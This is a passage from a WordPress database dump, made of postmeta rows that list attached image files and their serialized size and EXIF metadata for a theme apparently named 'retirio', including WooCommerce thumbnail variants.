52454;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:30:\"greater-commercial-378x525.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65338;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:30:\"greater-commercial-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130043;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:30:\"greater-commercial-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25029;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:30:\"greater-commercial-600x315.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53232;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:30:\"greater-commercial-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2575;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(133,1171,'_wp_attached_file','2022/06/service-01.jpg'),(134,1171,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:770;s:6:\"height\";i:451;s:4:\"file\";s:22:\"2022/06/service-01.jpg\";s:8:\"filesize\";i:111220;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"service-01-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13908;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"service-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6704;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"service-01-768x450.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65432;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-01-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74272;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-01-390x451.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39343;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"service-01-378x451.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38163;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"service-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20963;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"service-01-600x351.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43571;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3639;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(136,1204,'_wp_attached_file','2022/06/bg-service-sidebar-contact.jpg'),(137,1204,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:385;s:4:\"file\";s:38:\"2022/06/bg-service-sidebar-contact.jpg\";s:8:\"filesize\";i:23967;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"bg-service-sidebar-contact-288x300.jpg\";s:5:\"width\";i:288;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15625;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"bg-service-sidebar-contact-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5593;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:38:\"bg-service-sidebar-contact-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16350;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:38:\"bg-service-sidebar-contact-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3047;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(139,1244,'_wp_attached_file','2022/06/decor-service-details.jpg'),(140,1244,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:239;s:4:\"file\";s:33:\"2022/06/decor-service-details.jpg\";s:8:\"filesize\";i:31374;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"decor-service-details-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12810;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"decor-service-details-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5786;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"decor-service-details-300x239.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16112;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"decor-service-details-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3336;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142,1415,'_wp_attached_file','2022/06/kevin-martin.jpg'),(143,1415,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:80;s:6:\"height\";i:80;s:4:\"file\";s:24:\"2022/06/kevin-martin.jpg\";s:8:\"filesize\";i:6724;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145,1416,'_wp_attached_file','2022/06/jessica.jpg'),(146,1416,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:104;s:6:\"height\";i:83;s:4:\"file\";s:19:\"2022/06/jessica.jpg\";s:8:\"filesize\";i:9650;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"jessica-100x83.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3353;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(148,1417,'_wp_attached_file','2022/06/mike-hardson.jpg'),(149,1417,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:80;s:6:\"height\";i:80;s:4:\"file\";s:24:\"2022/06/mike-hardson.jpg\";s:8:\"filesize\";i:6765;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151,1514,'_wp_attached_file','2022/06/map-testimonial-home-2a.png'),(152,1514,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:664;s:6:\"height\";i:487;s:4:\"file\";s:35:\"2022/06/map-testimonial-home-2a.png\";s:8:\"filesize\";i:53418;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"map-testimonial-home-2a-300x220.png\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26462;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"map-testimonial-home-2a-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12085;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:35:\"map-testimonial-home-2a-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:78955;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:35:\"map-testimonial-home-2a-378x487.png\";s:5:\"width\";i:378;s:6:\"height\";i:487;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:60173;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:35:\"map-testimonial-home-2a-664x473.png\";s:5:\"width\";i:664;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:78567;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"map-testimonial-home-2a-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41372;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:35:\"map-testimonial-home-2a-600x440.png\";s:5:\"width\";i:600;s:6:\"height\";i:440;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87541;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"map-testimonial-home-2a-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5773;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154,1538,'_wp_attached_file','2022/06/background-2.jpg'),(155,1538,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:556;s:4:\"file\";s:24:\"2022/06/background-2.jpg\";s:8:\"filesize\";i:155550;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"background-2-300x87.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3604;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"background-2-1024x297.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27746;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"background-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2904;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"background-2-768x222.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16783;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"background-2-1536x445.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56031;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"background-2-768x556.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40452;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"background-2-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17890;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"background-2-378x556.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21896;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"background-2-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37598;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"background-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9456;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"background-2-600x174.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10949;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"background-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1558;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(157,1615,'_wp_attached_file','2022/06/background-3.jpg'),(158,1615,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:673;s:4:\"file\";s:24:\"2022/06/background-3.jpg\";s:8:\"filesize\";i:142936;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"background-3-300x105.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3212;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"background-3-1024x359.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18687;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"background-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2259;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"background-3-768x269.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11900;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"background-3-1536x538.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38639;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"background-3-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26282;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"background-3-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9354;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"background-3-378x673.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14165;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"background-3-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23214;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"background-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5860;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"background-3-600x210.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8365;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"background-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1421;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160,1708,'_wp_attached_file','2022/06/bg-revslider-home1-01.jpg'),(161,1708,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:820;s:4:\"file\";s:33:\"2022/06/bg-revslider-home1-01.jpg\";s:8:\"filesize\";i:239872;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9912;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home1-01-1024x437.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79182;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5988;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47362;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home1-01-1536x656.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163592;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90779;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35084;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-378x820.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59658;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81088;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"bg-revslider-home1-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19125;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-600x256.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31087;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3277;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162,1709,'_wp_attached_file','2022/06/bg-revslider-home1-02.jpg'),(163,1709,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:820;s:4:\"file\";s:33:\"2022/06/bg-revslider-home1-02.jpg\";s:8:\"filesize\";i:178580;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11034;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home1-02-1024x437.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71669;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6440;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45036;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home1-02-1536x656.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133864;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75125;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31465;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-378x820.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43932;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71116;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"bg-revslider-home1-02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18659;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-600x256.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31099;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3615;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(164,1710,'_wp_attached_file','2022/06/bg-revslider-home1-03.jpg'),(165,1710,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:820;s:4:\"file\";s:33:\"2022/06/bg-revslider-home1-03.jpg\";s:8:\"filesize\";i:219335;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10097;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home1-03-1024x437.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71061;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i: